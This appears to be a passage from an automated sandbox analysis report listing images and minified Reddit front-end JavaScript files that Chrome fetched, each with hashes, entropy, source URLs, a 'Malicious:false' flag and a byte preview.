                                                  Preview:import{a6 as e,u as t,v as s,t as o,_ as r,n as i,g as n,e as a}from"./shell-4994f581.js";import{FaceplateAutoHeightAnimator as l}from"./faceplate-auto-height-animator-6e628cf9.js";import{s as p,x as c}from"./icon-4d9be652.js";let u=class extends p{constructor(){super(...arguments),this.controls="",this.moreNoun="",this.lessNoun="",this.isOpen=!1}async toggleIsOpen(){this.isOpen=!this.isOpen;const t=document.querySelector(`#${this.controls}`);if(!(t instanceof l))return;const s=t.querySelector("faceplate-partial");s&&s.loading===e.Programmatic&&await s.load(),t.open=this.isOpen,this.isOpen&&requestAnimationFrame((()=>{t.querySelector("left-nav-topic-tracker a")?.focus()}))}render(){return c` <faceplate-tracker source="nav" action="click" noun="${this.isOpen?this.moreNoun:this.lessNoun}"> ${t({appearance:"plain",size:s.Small,attributes:{"aria-controls":this.controls,"aria-expanded":this.isOpen?"true":"false",onclick:this.toggleIsOpen,className:"ml-xs mt-2xs"},children:this.isOpen?"See l
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 48x48, components 3
                                                  Category:dropped
                                                  Size (bytes):1405
                                                  Entropy (8bit):7.642584950207401
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CFD8C4762B1214BA8DAE7641779F4257
                                                  SHA1:526C66519A7E223D69D1905B4B528B267E6C2D4F
                                                  SHA-256:6F6B5D91ADCAFA55F0A31CA94032D37CA2B088DC90855A366B8E82C673CD172E
                                                  SHA-512:934F6EA633B525E8E9CB381260259AA40E26BB0C2D264EC5B4991CD3060D202066CD380A1DFC6714E28E558EE7B720ABF007D374E877831F00BA83BFE85C98CA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......0.0..".....................................2...........................!..Aq12Q..3Ba..."$Sb..............................".........................!Q1a"#B............?....\...`;...0.:..W<.(.1..[v.Nh.....q%z.......%.....\..;.......zTW.. y...1..m9.*+;0UPI$...l..n=.-..I.....#.....-x.ZV..{.....c.g.v.3.J.p.o....-1..M../.[.\F...Z.s.......&Yd_.y..F.&...;+Cz_...0<H...l.;sWnh%^.N.m...........gj-.i.D...'.y..h.m...t..y.x^r;.d....z..S.Q[.3.0zQec....:<.sd2..e.....3....b.......V.7ll.Y.u.MV.....&dy\..B.L.Z-.%G.D...YXs....t..8.dtNr.<.w.pW%.j.V.W.).5?tp.....7$?W..v?..k..:mUsR{X..jU._......Dm)O..~.2l6)....hx.$.F.....Gs8.y.VC.u.V...(S.q..B> ......;#l..e...jT[lQ.!n...."..G2.3...w...V.x...o.~.tb...~k.#b.m..)}..)....,....s.9?um*..U.....J..e-.N..\.W..E..Ihg&P..Q".@..O..=D.i.K#C!yY..b..o...!l\E\..ln.K%b.*....A..i4...D...3W.R..3K.(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 320x213, components 3
                                                  Category:dropped
                                                  Size (bytes):15446
                                                  Entropy (8bit):7.976186448451904
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:51B980AA8C550E196A7FD1957C9B4F15
                                                  SHA1:60EEAB867800FAB126DE75161E935CDAEFCF3880
                                                  SHA-256:1FCC1453449D1907CDCEBB848EBB37EEC772902456F2FAF1E8A5246279F6E38C
                                                  SHA-512:282A7F1FF0FAFDDDE4E0FB3F1F264B104699F4CD728CFE30CE1111F3769DAECB2A96ADD4CF3D98D1216701D173A9DCA63F23E0417D214D423BCBEB991E373E61
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........@..".........................................H..........................!1.AQ.."Raq..#2Bb..3Sc....4Cr.$....DEd...&5................................1.......................!1.AQaq."2B......#CRSb..............?....J0.odk...j..M.E..2.....KmO..+TI.+.j}.....m....H&M. +\..[I.v.-....ZE.5.....a=...d.{....r...9..Q...XB.kn.S.B..j.+.MP.eS...,MZY.K<...\{g........}..p..........a.<..;tR@E'4....}.......^.~.lbvU}...9.U...m..E....}../.&.C.gZ..2.....0A................k.Z>....>y1.l.]...zt..s..%[.R.'...m.f.ca.[.-.2....p.t...$.......N-...6.[+.*..qJ.1.Lt..........f)b..i.(. ".V.)M.@X1Z..'mse..)M.E..l.T......\.@P!J[(.....m..gf..*.:.1.J.<.M1.P..S.t.gM)T.4......+.#.V.I_..Z4.i..;%.e.jRis..2.&_..]...k=....:.....S+..fN......I../(.....\9..i6.....{}...=.X..M[[]Kn...q.S...qc......r.9.&.m.l...TZ[...@..P.QFA.O..\......,@....!%....i..)
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1080x2341, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):128188
                                                  Entropy (8bit):7.997071914271353
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:8E72F687BCC9AF3A551E1AC822E5DE8A
                                                  SHA1:D692BC9FAE7670FE10CD1EC6CBB815C9D78BE5F2
                                                  SHA-256:B56787B2A8CE0B6EF01C4BEEB1BC5168E9C2BE82AD75DB0F1DC71321F2B3E7A4
                                                  SHA-512:F70D4720D3EB75F7C7C1EBD54957B40B2D71CACC3FBAC352C9F2E59F1D6A2E8305EE07A6AF057ED8961DA0AEB30E81FD801EFDFD8132788CEF3336B686C09D89
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://preview.redd.it/aio-for-demanding-to-be-paid-after-wearing-something-v0-55memi4s1bwe1.png?width=1080&crop=smart&auto=webp&s=9bdc32b850284ed51942f8e35b5dee715e7cec9e
                                                  Preview:RIFF....WEBPVP8 ....0....*8.%.>Q$.E../.%..Q...i3.}.b.....o.........x..{......E..'.....v....|.........a.o..._.............|....w......C.........-....k'......y2yE..W...8G.C.o..........}.?....y.......o._..{......|........?...~y..............{..........y..Lo...... ...A..y...o.}..E.M.O.....i..]..7.>.k..&....t^.........{5.x.~..f./.o.}..E.M.O.....i..]..7.>.k..&....t^.........{5.x.~..f./.o.}..E.M.O.....i..]..7.>.k..&....t^.........{5.x.~..f./.o.}..E.M.O.....i..]..7.>.k..&....t^.........{5.x.~..f./.o.}..E.M.O.....i..]..7.>.k..&....t^.........{5.x.~..f./.o.}..E.M.O.....i..]..7.>.k..&....t^.........{5.x.~..f./.o.}..E.M.O.....i..]..7.>.k..&....t^.........{5.x.~..f./.o.}..E.M.O.....i..]..7.>.k..&....t^.........B....[^...dUfE.?".;U.._V......%#.Q.q.l.....%..U.+6..N..0$..t.G.,.f.C. ..!.+T.2. ..M k.Z......5.......`[.........?.Y.......vo...7...A..z%.-.#\....|ky.]F.S.v..........OE.....[!..+.[......5...J.........XZ..;z:7...Z/....9.P.. .u...:{.?...|.....?...Q4.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 48x48, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):1278
                                                  Entropy (8bit):7.80472036353124
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:922C4674EF138631BE2A41ABFCBD1F72
                                                  SHA1:5F0DF016336ECC2AFA56361DD45BAD67432D0AD6
                                                  SHA-256:69E17BCA4AC0F9C0139EF1E24B67868F802D771CBBC8AA3CE832FD1366545CD6
                                                  SHA-512:B4CF1331B3FD7CBDA85E82DEC9075403A6E73E232FA56A9621EED03C69DE34BE705223A8B30C0184A9F13DFA99BF1F5F8325EE06B8EA263366CD8FEF2C899FE9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2cneq/styles/communityIcon_fy84mdgh75201.jpg?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=472bd1c805e4b619700ab09f74e694a5cd850341"
                                                  Preview:RIFF....WEBPVP8 .........*0.0.>Q..D#....5.8....J..=Q2.l.........@../.Jk.?.w.......>.}......?*..y../....X_.w..7.......?..Q.Q.I.......i_7.....C.......?.?......-.U.g.......4...%.......U%I...\,.w.C...X..Up{.+w.....+.|.z..4......bJ.`?........q.%}.G]......M......q.&.:3..3.B...H.......*........[u.e._..W.!.ry...s6......4&.......T.......-4|..".....^.J.d[......].v..f..Z..|_.Gv.s..]kJ..X..e$x..#..2......@*..R..K=..$..h....)..._A.$..<7...~,...o.O,Dw..........k......O$n...y...`...........=..#...k...c.....U.fp..0...d0...m.A...m.....{.^[...2...X.......4M ...^Xyv....v..(...wI.\....W..]8.N...L......*..E.....a.?q...1'FC........C.-...\......T+Q.OO.Mhm.\......./cS.[.......E.M..TvzL6.._..^....Dw......R...f|)..$a....S!..L^r.%..&j.....h%.cb..@.RW........|.~.S.1.6.....x..q.......x....=7..gBFC.S.W.....Q.... .Y...9f..W!.9;.~=....K...K..1....*.._.k}2.e..fD..3... 9.r..1..u...J.[=R}v.9...e.)D.. ?.-....*..@~.f...X.*z./.B..W.(St..*..#-.ev.........E.f7...t..L..V.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (677)
                                                  Category:downloaded
                                                  Size (bytes):743
                                                  Entropy (8bit):5.100279127314916
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C3CE84811857C37D8074D624CD3C9639
                                                  SHA1:B3994C85CB3D4141ECA42049E82949688A5F111B
                                                  SHA-256:A5D1B14CB209415B6C310C4D98B3CD0C1B9BD151223BB94D4861B89864306278
                                                  SHA-512:2163486B60849DD37E78F722B313520AE0EFCD5F442BB18C297176D890C7FA657C892794F57F4E330F33EB37FA1159AF9670F98EF467FFE715C40B825F8B9D79
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/expandable-mod-reports-base-fe038b1b.js
                                                  Preview:import{_ as e,g as t}from"./shell-4994f581.js";import{s}from"./icon-4d9be652.js";class o extends s{constructor(){super(...arguments),this.areInlineReportsExpanded=!1,this.filtersCount=0,this.reportsCount=0,this.handleExpandStateChanged=e=>{this.areInlineReportsExpanded=e},this.handlesInlineReportsCountChange=(e,t)=>{this.filtersCount=e,this.reportsCount=t},this.onToggleReportsChange=e=>{const{action:t}=e;switch(t){case"expand":this.areInlineReportsExpanded=!0;break;case"collapse":this.areInlineReportsExpanded=!1}}}}e([t()],o.prototype,"areInlineReportsExpanded",void 0),e([t()],o.prototype,"filtersCount",void 0),e([t()],o.prototype,"reportsCount",void 0);export{o as E};.//# sourceMappingURL=expandable-mod-reports-base-fe038b1b.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (9933)
                                                  Category:downloaded
                                                  Size (bytes):10001
                                                  Entropy (8bit):5.068463670990247
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F23637084ABF220598F51555A72E53AF
                                                  SHA1:44C1E4633739EEAABB02BD7310A53B41A32708B0
                                                  SHA-256:DE58233D61C981B912759EFAC3047F73A0F43B5F130150B2D2FFAE8255AF924A
                                                  SHA-512:EE4C0602B0979F076EF9413086C6F32BCDB8ABBC70CD6719A6C59E8E17364D3BB78F2638C109D863CF5A453737A2C45AE7721B232E945696D196C4A0C6B16C84
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/subreddit-posting-eligibility-cf0ca862.js
                                                  Preview:import{a as t,cK as e,c3 as i,c2 as n,aV as o,aq as s,b2 as r,bx as l,bv as p,bw as a}from"./icon-4d9be652.js";import{ez as c}from"./shell-4994f581.js";const h={variantFlipOrder:{start:"sme",middle:"mse",end:"ems"},positionFlipOrder:{top:"tbrl",right:"rltb",bottom:"btrl",left:"lrbt"},position:"bottom",margin:8,padding:0},u=(t,e,i)=>{const{container:n,margin:o,padding:s,position:r,variantFlipOrder:l,positionFlipOrder:p}={container:document.documentElement.getBoundingClientRect(),...h,...i},{left:a,top:c}=e.style;e.style.left="0",e.style.top="0";const u=t.getBoundingClientRect(),d=e.getBoundingClientRect(),m={t:u.top-d.height-o,b:u.bottom+o,r:u.right+o,l:u.left-d.width-o},f={vs:u.left,vm:u.left+u.width/2+-d.width/2,ve:u.left+u.width-d.width,hs:u.top,hm:u.bottom-u.height/2-d.height/2,he:u.bottom-d.height},[g,b="middle"]=r.split("-"),y=p[g],E=l[b],{top:v,left:w,bottom:_,right:S}=n;for(const t of y){const i="t"===t||"b"===t,n=m[t],[o,r]=i?["top","left"]:["left","top"],[l,p]=i?[d.height,d.wi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, progressive, precision 8, 640x640, components 3
                                                  Category:dropped
                                                  Size (bytes):20870
                                                  Entropy (8bit):7.963470568969579
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3DE497885F63A231ED3820D11894B79B
                                                  SHA1:17BE7E622B1EBA3D877516934417566601821B43
                                                  SHA-256:5932FA6DBFCDC8AA2E498CD045070F28D56E46BD78DBD88CA939A2536A7E3A24
                                                  SHA-512:105FAD8FD7300BD805D3E7501D4B460C85ED4DA283C34C75A820E3D0E337C0463A37BCB38971949F6248187B4FA12CEA8B1F4FBFBCCCB80769C9953BF29C869C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}...........".................................................................................RW..E%.(!..I"rH.ur.].$.*..F&;* .v.P.....bi.B...'m...l.l.F.@<...q....<tO=<KR..\.jM,.if..Fpz.(X#H8D.h6.j....\.....LY...........\!.(..*.N..N].TbH.D..).P.f'6M....C....SV..tho...O.^.%.m..[..8w.... \......U.....Z.R..X ..)lU$).....X...1.ku.Leu....T.Q@....'W$.aP..)c.p.)i.Y.G.U...:$.lTh1S...j.Q2;;....7.=..1.'....p...G..<..h.8U.Md^..e.M.#B. .. ....BlX0ZZ.....t.r..8X.B...aA..C...\.ui..&% ..L.v`sdTst.aDtsVp....v.hZ3R6F..Qo.....b.z{=\....:|.....o.c...r3u2..e.....(K.iIj.b.(...K.....)...`!.4tl.O..q.B.......9$NB.ae.%e%].Up.K...(.)j..*%d.07.L..S.F..u.;3....r........F.....>Q...:.....4..y...R.1m)l[KSUR.5LJ......Kb.,..V..}.h.|%.`.M......T0.@..7q.K.R.IF6..B..d%7e-2e.if&.0X.4!..+........w...=7.....]c..A.?..k.qz.../....F|{0....\ ...58..M
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1581)
                                                  Category:downloaded
                                                  Size (bytes):1629
                                                  Entropy (8bit):5.22922125098429
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:40EFC2F30EE2DCC0C5ADC58FCEB821B4
                                                  SHA1:A7E19BF66861FAD935EBCDD1620EC91CD9CD8351
                                                  SHA-256:C8FD63AA68CBF41BC2D319AD1629607F063CE45C8946ACD7C8A9B23F67D93C2A
                                                  SHA-512:26E30CAA49CC20ED2546F2465582C85BD76C52A20CDFABC7B40689750B9BE0C43A033359134A86DA31C98F2B12CB3AD6CB078B9E827FFF33C216F29F188F42D9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/postFlair-1f8d3c96.js
                                                  Preview:import{bE as t,E as i,b as e}from"./shell-4994f581.js";const n=/(\.|\/\/)(reddit\.com|snoo\.dev|redditstatic\.com|redd\.it|redditmedia\.com)$/;class r extends t{constructor(t,e){super(t),this.events=new i(this,(()=>this._host)),this.handleMouseClick=(t,i)=>{if(t.isLinkClickHandled)return;const e=t.composedPath();for(const n of e){if(!(n instanceof HTMLAnchorElement))continue;const e=n.getAttribute("href")||"";if(this.isOutboundUrl(e))return this.trackOutboundLinkClick(e,i),void(t.isLinkClickHandled=!0)}},this.events.define("click",(t=>{this.handleMouseClick(t,e())}))}isOutboundUrl(t){if(t.startsWith("/"))return!1;try{return null==new URL(t).origin.match(n)}catch(t){return!1}}trackOutboundLinkClick(t,i){this._host.trackEvent(this.outboundLinkClickEvent(t,i))}outboundLinkClickEvent(t,i){return e({source:"link",action:"click",noun:"outbound_link"},{outbound:{url:t},action_info:{page_type:i.pageType},...i.postId?{post:{id:i.postId}}:{},...i.subredditId?{subreddit:{id:i.subredditId}}:{},...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4284)
                                                  Category:downloaded
                                                  Size (bytes):4346
                                                  Entropy (8bit):5.106785110028091
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B3B0997D37CEA4E5AA9757D2E84A602D
                                                  SHA1:06579098051BF0C90E83C9C73E9839CFB438E4FE
                                                  SHA-256:BE4B18D86A6362290D1B91901FE2BEF54DFDCB645E2A4269411E95DF754B6CC6
                                                  SHA-512:5C736C34963CB35203EFC7FD789CA4FC36D165CA073475CCA1114E403E72D3E7AFF68D3D3236044D54A0430419E910A0F0D47E75EF87340F31946FAA36CA1943
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-dropdown-menu-f991e0ba.js
                                                  Preview:import{_ as e,n as t,I as n,e as i}from"./shell-4994f581.js";import{s,a as o,x as r}from"./icon-4d9be652.js";import{P as l}from"./subreddit-posting-eligibility-cf0ca862.js";import{H as a}from"./club-award-confirmation-client-js-b22d6f4f.js";let d=class extends s{constructor(){super(...arguments),this.position="bottom-middle",this.triggerEvent="click",this.disabled=!1,this.manualTriggerFocus=!1,this.containerElement=document.documentElement,this.scrollContainerElement=window,this.onopen=null,this.onclose=null,this.emitter=a(this),this._popperController=new l(this,{position:this.position,referenceElementKey:"referenceElement",popperElementKey:"_menu",containerElement:this.containerElement,scrollContainerElement:this.scrollContainerElement,manualTriggerFocus:this.manualTriggerFocus}),this._eventUsedMap=new WeakMap,this.updated=e=>{e.has("position")&&this._popperController.updateOptions({position:this.position}),e.has("manualTriggerFocus")&&this._popperController.updateOptions({manualTrigg
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):215004
                                                  Entropy (8bit):5.027062313048234
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F5340351EE7DD230F4DEE0106A0D2D5E
                                                  SHA1:20B701047667A2222487851016BA0CCAA69B7ADD
                                                  SHA-256:5181FB9121EB8DEF3D4ED374E376429AA3C75961222402E4B1F2B1B4A5C5C20F
                                                  SHA-512:BFEBBFEAB12D177515701086F5CE24CB299FB87CA0079F6FA8BBFDA842952E35409356A24A2196EF2C2D8BC1AC337DD76036F6AAF3A19B9BE9A95378879751AB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/icon-4d9be652.js
                                                  Preview:const a=window,t=a.ShadowRoot&&(void 0===a.ShadyCSS||a.ShadyCSS.nativeShadow)&&"adoptedStyleSheets"in Document.prototype&&"replace"in CSSStyleSheet.prototype,e=Symbol(),l=new WeakMap;let s=class{constructor(a,t,l){if(this._$cssResult$=!0,l!==e)throw Error("CSSResult is not constructable. Use `unsafeCSS` or `css` instead.");this.cssText=a,this.t=t}get styleSheet(){let a=this.o;const e=this.t;if(t&&void 0===a){const t=void 0!==e&&1===e.length;t&&(a=l.get(e)),void 0===a&&((this.o=a=new CSSStyleSheet).replaceSync(this.cssText),t&&l.set(e,a))}return a}toString(){return this.cssText}};const o=(a,...t)=>{const l=1===a.length?a[0]:t.reduce(((t,e,l)=>t+(a=>{if(!0===a._$cssResult$)return a.cssText;if("number"==typeof a)return a;throw Error("Value passed to 'css' function must be a 'css' function result: "+a+". Use 'unsafeCSS' to pass non-literal values, but take care to ensure page security.")})(e)+a[l+1]),a[0]);return new s(l,a,e)},i=(e,l)=>{t?e.adoptedStyleSheets=l.map((a=>a instanceof CSSStyl
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (565)
                                                  Category:downloaded
                                                  Size (bytes):630
                                                  Entropy (8bit):5.0243687409622755
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:637439EDEEF6B67C67ED01ED58323D91
                                                  SHA1:21B8A056A0CD400DCE58F664EB19F54B0E57DC9A
                                                  SHA-256:D5F8312C98306D9F73F68D2738BF064F50DD506524E1C3DD407FC40957EF7992
                                                  SHA-512:948E0640477B728C84F062260DFFC813EB529A3E6A4591E1D1014C786467E7C3A612385B06F307C0C1989035ACBB9BE36A6520D2F00FF2CA2B32DE61ED833D77
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/screen-reader-alert-outlet-709e38dd.js
                                                  Preview:import{h as e,t,_ as r,e as s}from"./shell-4994f581.js";import{s as n,x as a,a as o}from"./icon-4d9be652.js";let i=class extends n{announce(t){const r=t.message,s=t.options?.priority||e.polite,n=document.createElement("faceplate-screen-reader-content");n.setAttribute("aria-live",s),n.setAttribute("aria-atomic","true");const a=document.createElement("span");a.innerText=r,n.appendChild(a),this.replaceChildren(n)}render(){return a`<slot></slot>`}};i.styles=[o`:host{position:fixed}`,t],i=r([s("screen-reader-alert-outlet")],i);export{i as ScreenReaderAlertOutlet};.//# sourceMappingURL=screen-reader-alert-outlet-709e38dd.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3173)
                                                  Category:downloaded
                                                  Size (bytes):5041
                                                  Entropy (8bit):5.128775742482319
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:43BB187C612B0FF668A23C4998D474AE
                                                  SHA1:121C2BC69130007DF4B92B792C044B90AB550F8E
                                                  SHA-256:7124540A2012387C52CDFBD035E2D965B8ED28C3176D137B8CF3B3B29DB8B01B
                                                  SHA-512:97225A77933CCAA436FA3C93B9EDBCC1CAEB514C00917CE729B6B4D06FF4C05B4FECF69F329BDA63129DCDAF345ECBE466B9E2D9948FAC379E6202A634AC58A5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/tooltip.base-aa9be46d.js
                                                  Preview:import{_ as e,cJ as t,n as i,b8 as o,aY as s,cK as a,cL as n,cM as p,cN as h,cO as r,a3 as l,aS as d}from"./shell-4994f581.js";import{x as c}from"./icon-4d9be652.js";import{aq as u,ar as f}from"./club-award-confirmation-client-js-b22d6f4f.js";import{P as v}from"./rpl-popper-3f91bd17.js";const y={Neutral:"neutral",Inverted:"inverted",Primary:"primary"};class m extends o{constructor(){super(...arguments),this.contentSlotRef=s(),this.defaultSlotRef=s(),this.bodyRef=s(),this.popperRef=s(),this.interactionController=new u(this,{isInteractedWith:e=>e.open,hoverDelayStart:e=>a(getComputedStyle(e).getPropertyValue("--show-delay")),hoverDelayEnd:e=>a(getComputedStyle(e).getPropertyValue("--hide-delay"))}),this.appearance=y.Neutral,this.content="",this.placement=v.Top,this.disabled=!1,this.distance=4,this.open=!1,this.skidding=0,this.trigger="hover focus",this.hoist=!1,this.noAnimate=!1,this.eventUsedMap=new WeakMap,this.handleDocumentKeyDown=e=>{"Escape"===e.key&&(e.stopPropagation(),this.hide(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 128 x 53, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):13835
                                                  Entropy (8bit):7.976757316129754
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:440E7350705755AE77A54185F9347424
                                                  SHA1:7B616BA0D66D58422AABB6C9A0C41D58205946E6
                                                  SHA-256:F83A80533EB80937A5CE30E8E41DEB26E89D96D22660B4488C8E173E54AFBABE
                                                  SHA-512:3AD74483FA2EF283CF893206CDF51BE4D850787D79C13754AA208440900D48225B5437B493137FB58F3A5F6449494845F2213B12F693D3EFB28BA75C0B64DA53
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://emoji.redditmedia.com/91jo67p59m201_t5_2qh1i/cicada
                                                  Preview:.PNG........IHDR.......5......9.....ZeXIfMM.*.............................J...........R.(.............................H.......H.....R.4..5lIDATx..|..\e..wo.[.....N....t.........qAqy3....y24...:...6....@......}.N....W..}.%....Q...JU......|......]...rWW.Q..K._..vzW...J.u]z......x..-b.u.]b..9.~....-.m...Y..1;;;_.^..........9.9...$I...w}....#...F...]S.$=..&.O.G.J6.-(H@.....G..~.h.l./[.ia.8..%..G.:.o.y......._|..rf..0....A...eq......`3}....3.}...\...d3.........F.Jz....../y.8..+.C/,..[..]u..I........o^.^<..l.as...hR'......S...5...u^.n.Y..;.....u..6.Mf...c...>..r.....S5M.o.[....L.~\..6.....e..I].F`q.%g..`(L.... ..&.!.)"...j.@zf.{....wv....@~.p.....0.w..:!..O.!.`....I.~..s.~..l+.....l-......O`......a.].....R>:!.e..H.M....Dd......d...W..sP..$.zuY..2.&.Y.2.......]...<.N.V..uO.*.t)..d.....'..V.l...O..........=A.[.2L.v.A.....zzJc...noo..K.a.......t.P..".. ...}7....6[...^.E...2rp'FO.1.kj........k.L....!..E..."9.tl.&K...3hH4.,.s...f...H.<..X.hI..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (14640)
                                                  Category:downloaded
                                                  Size (bytes):14684
                                                  Entropy (8bit):5.34196964325681
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BC10237C0D50037D96EBAC6823CF5D3D
                                                  SHA1:1F163B9E1D0BEC167155D76FD1D60D138F3CF5AF
                                                  SHA-256:D4379499DC462331BA01C75ABCD494A11F2D9B428C7794F0CCFE9E142D48DBA0
                                                  SHA-512:F4A5CE3594422E825A5116C5D29DDE77A34A9393FC55B79658EC8A77C8986E3FB9949CB5BAD292A3E9E29F06467AECB1DA8D5204AF62A132B81BD2BB0E77EC48
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/index-e2ec7e4b.js
                                                  Preview:import{a as t,v as e,U as o,d_ as n,m as a,t as r,J as s,_ as i,n as l,g as p,e as c,aB as d,dp as u,K as m,O as v}from"./shell-4994f581.js";import"./shop-gallery-data-fetcher-client-js-a66aa4d3.js";import{x as b,l as h,o as w,A as f,bc as y,bd as g,s as $,I as x,g as S,be as k,bf as I,bg as C,b5 as U}from"./icon-4d9be652.js";import{I as z,c as T,A as N,B as A,g as E}from"./content-action-button-5fdf727f.js";import{A as V}from"./award-controller-7d9d8182.js";import{b7 as B,q as D}from"./club-award-confirmation-client-js-b22d6f4f.js";import{p as j}from"./modActions-7666e3bf.js";import{a as M}from"./awardsTelemetryState-36bf2914.js";import{a as P}from"./awards-d066f3fe.js";P.Limited,P.Community,P.Free;let X=class extends(t($)){constructor(){super(...arguments),this.size=e.Medium,this.disabled=!1,this.count=0,this.hasEnteredViewport=!1,this.awardController=new V(this,{getThingId:()=>this.thingId,getAwardPromoConfig:()=>({id:this.awardPromoId,type:this.awardPromoType}),onAward:t=>{this.cou
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (387)
                                                  Category:downloaded
                                                  Size (bytes):455
                                                  Entropy (8bit):5.1602829609197425
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:790318D2EB50C36EBD849E95BD125231
                                                  SHA1:D589EBB1CA35663D8712A97D0AB96FC8FC657E18
                                                  SHA-256:03C054F8C814D92BB049435117CEC8BC9E2C74765C7A49BB97FEA32FE396B4A7
                                                  SHA-512:1779BB9680DA7760C27459F0A0EFD22F79A7B9663D1E2A9C076953FC5451B87A3DB2AD63FA5A32BCFFF5F0DA379E7D5793C60BBFD01E54676FE0D0ADF1E50E93
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-interactable-element-9eb68123.js
                                                  Preview:import{_ as e,e as t}from"./shell-4994f581.js";import{s as n,x as i}from"./icon-4d9be652.js";let r=class extends n{render(){return i` <slot @click="${this.interactionHandler}" @keydown="${this.interactionHandler}"></slot> `}interactionHandler(e){e instanceof KeyboardEvent&&"Enter"!==e.key||this.dispatchEvent(new Event("interactionEvent"))}};r=e([t("shreddit-interactable-element")],r);.//# sourceMappingURL=shreddit-interactable-element-9eb68123.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (37798)
                                                  Category:downloaded
                                                  Size (bytes):37857
                                                  Entropy (8bit):5.344149993192499
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DA46E35AA7D87B12D365D5B980D202B2
                                                  SHA1:576ADF0024D435ABDEC9065E3D39B2DC8345906C
                                                  SHA-256:0F741D6E55F95B4F7A758A3C050E849B44A99BE344939C63CA7F0CBF6B6130D7
                                                  SHA-512:3159ACE1F72AC5C1059D2BDE2071A0A614BCCB94EA87001AB6E501094D4285AEDB0629E42BAA2C6BC17C1552FF67CAFFEF31ADCE769B97A183577E7EAF95671A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/with-ad-observer-5931d8eb.js
